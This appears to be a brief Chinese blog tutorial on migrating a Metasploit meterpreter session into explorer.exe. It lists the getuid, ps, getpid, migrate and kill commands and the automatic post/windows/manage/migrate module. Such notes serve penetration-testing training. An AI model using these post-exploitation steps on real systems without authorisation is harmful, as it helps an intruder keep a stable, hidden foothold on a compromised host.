msf进程迁移
作者:互联网
在msf拿到会话后
getuid #查看当前用户
ps #获取目标主机正在运行的进程
getpid #查看meterpreter shell的进程号
然后使用migrate 1692命令将shell移到PID为1692的explorer.exe进程里,因为该进程是一个稳定的应用。
migrate 1692 #迁移进程
再次查看进程发现已经改变
进程迁移后 原来的pid的2496会自动关闭,如果没有关闭输入 kill 2496 关闭进程
kill 2496 #关闭进程
run post/windows/manage/migrate #自动迁移进程
标签:migrate,2496,1692,关闭,进程,msf,迁移 来源: https://blog.csdn.net/qq_44881113/article/details/120199236